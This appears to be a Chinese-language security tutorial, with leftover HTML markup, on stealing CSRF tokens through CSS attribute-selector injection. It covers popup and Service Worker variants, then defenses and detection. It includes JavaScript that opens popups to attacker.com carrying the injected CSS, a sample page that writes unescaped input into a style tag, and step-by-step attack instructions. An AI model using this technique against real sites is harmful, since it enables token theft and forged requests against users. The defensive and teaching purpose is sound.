CSS注入窃取CSRF令牌技术详解<\/h1>

1. 技术背景<\/h2>

CSS注入是一种利用CSS属性选择器窃取敏感数据的技术，特别适用于窃取CSRF令牌。这种攻击方式利用了以下关键特性：<\/p>

CSS属性选择器<\/strong>：可以根据属性值匹配子字符串来选择元素<\/li>
资源加载机制<\/strong>：通过匹配结果触发外部资源加载<\/li>

无iframe限制<\/strong>：采用弹窗技术绕过iframe限制<\/li> <\/ul>
2. 核心原理<\/h2>
2.1 CSS属性选择器攻击<\/h3>
攻击者利用CSS属性选择器的三种匹配模式：<\/p>

前缀匹配<\/strong>：[attribute^="value"]<\/code> - 匹配以特定值开头的属性<\/li>
后缀匹配<\/strong>：[attribute$="value"]<\/code> - 匹配以特定值结尾的属性<\/li>
包含匹配<\/strong>：[attribute*="value"]<\/code> - 匹配包含特定值的属性<\/li> <\/ol> 2.2 窃取机制<\/h3> 通过CSS注入将恶意样式表注入目标页面<\/li> 使用属性选择器针对包含CSRF令牌的表单元素<\/li> 当属性值与猜测模式匹配时，触发外部资源加载<\/li> 通过观察加载的资源，逐字符推断出完整的令牌值<\/li> <\/ol> 3. 技术实现细节<\/h2> 3.1 无iframe技术实现<\/h3> 传统方法依赖iframe，但现代网站大多限制iframe使用。替代方案：<\/p> \/\/ 创建虚拟弹窗 <\/span><\/span><\/span><\/span>var<\/span> win2<\/span> =<\/span> window.open<\/span>('https:\/\/attacker.com\/placeholder'<\/span>, 'f'<\/span>, <\/span><\/span> "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1"<\/span>); <\/span><\/span> <\/span><\/span>\/\/ 注入CSS的弹窗 <\/span><\/span><\/span><\/span>var<\/span> win2<\/span> =<\/span> window.open<\/span>( <\/span><\/span> `https:\/\/attacker.com\/cssInjection\/victim.html?injection=<\/span>${<\/span>css<\/span>}<\/span>`<\/span>, <\/span><\/span> 'f'<\/span>, <\/span><\/span> "top=100000,left=100000,menubar=1,resizable=1,width=1,height=1"<\/span> <\/span><\/span>); <\/span><\/span><\/code><\/pre>3.2 无服务器端技术<\/h3> 利用Service Workers拦截请求，避免需要后端服务器：<\/p> 注册Service Worker拦截特定请求<\/li> 通过postMessage将窃取的数据传回主页面<\/li> 将CSRF令牌存储在本地存储中供后续使用<\/li> <\/ol> 3.3 目标页面示例<\/h3> <form<\/span> action<\/span>=<\/span>"https:\/\/victim.com"<\/span> id<\/span>=<\/span>"sensitiveForm"<\/span>> <\/span><\/span> <input<\/span> type<\/span>=<\/span>"hidden"<\/span> id<\/span>=<\/span>"secret"<\/span> name<\/span>=<\/span>"secret"<\/span> value<\/span>=<\/span>"dJ7cwON4BMyQi3Nrq26i"<\/span>> <\/span><\/span><\/form<\/span>> <\/span><\/span> <\/span><\/span><script<\/span> src<\/span>=<\/span>"mockingTheBackend.js"<\/span>><\/script<\/span>> <\/span><\/span><script<\/span>> <\/span><\/span> var<\/span> fragment<\/span> =<\/span> decodeURIComponent(window.location<\/span>.href<\/span>.split<\/span>("?injection="<\/span>)[1<\/span>]); <\/span><\/span> var<\/span> htmlEncode<\/span> =<\/span> fragment<\/span>.replace<\/span>(\/<\/g<\/span>,"<"<\/span>).replace<\/span>(\/>\/g<\/span>,">"<\/span>); <\/span><\/span> document.write<\/span>("<style>"<\/span> +<\/span> htmlEncode<\/span> +<\/span> "<\/style>"<\/span>); <\/span><\/span><\/script<\/span>> <\/span><\/span><\/code><\/pre>4. 攻击步骤详解<\/h2> 发现注入点<\/strong>：找到存在DOM型CSS注入漏洞的页面<\/li> 构造恶意CSS<\/strong>：编写逐字符猜测CSRF令牌的CSS代码<\/li> 触发弹窗<\/strong>：通过用户事件(如点击)触发恶意弹窗<\/li> 加载恶意CSS<\/strong>：在弹窗中加载包含恶意CSS的目标页面<\/li> 监听响应<\/strong>：通过Service Worker拦截资源请求<\/li> 收集令牌<\/strong>：分析请求模式，逐步构建完整CSRF令牌<\/li> 发起CSRF攻击<\/strong>：使用窃取的令牌构造恶意请求<\/li> <\/ol> 5. 防御措施<\/h2> 实施内容安全策略(CSP)<\/strong>：<\/p> 限制外部CSS加载<\/li> 禁止内联样式<\/li> <\/ul> <\/li> 输入过滤与编码<\/strong>：<\/p> 对用户提供的CSS内容进行严格过滤<\/li> 对特殊字符进行编码<\/li> <\/ul> <\/li> CSRF令牌保护<\/strong>：<\/p> 将令牌存储在HttpOnly cookie中<\/li> 使用一次性令牌<\/li> 将令牌与用户会话绑定<\/li> <\/ul> <\/li> 浏览器安全策略<\/strong>：<\/p> 启用XSS保护<\/li> 限制弹窗行为<\/li> <\/ul> <\/li> <\/ol> 6. 技术限制与注意事项<\/h2> 浏览器兼容性<\/strong>：<\/p> Service Worker目前主要支持Chrome<\/li> 跨域Service Worker拦截仍处于实验阶段<\/li> <\/ul> <\/li> 时间敏感性<\/strong>：<\/p> 攻击需要在短时间内完成(约10秒)<\/li> 需要用户交互触发初始弹窗<\/li> <\/ul> <\/li> 反射型vs存储型<\/strong>：<\/p> 反射型CSS注入比存储型更危险<\/li> 存储型需要服务器在渲染前更新CSS<\/li> <\/ul> <\/li> <\/ol> 7. 扩展思考<\/h2> 与其他攻击结合<\/strong>：<\/p> 与XSS结合提高攻击成功率<\/li> 与点击劫持结合诱导用户交互<\/li> <\/ul> <\/li> 未来发展方向<\/strong>：<\/p> 随着浏览器功能演进可能出现新变种<\/li> Web组件等新技术可能引入新的攻击面<\/li> <\/ul> <\/li> 检测与监控<\/strong>：<\/p> 监控异常CSS加载行为<\/li> 检测可疑的Service Worker活动<\/li> <\/ul> <\/li> <\/ol> 通过深入理解这种攻击技术的原理和实现方式，安全人员可以更好地防御此类攻击，同时也能在渗透测试中合理评估相关风险。<\/p>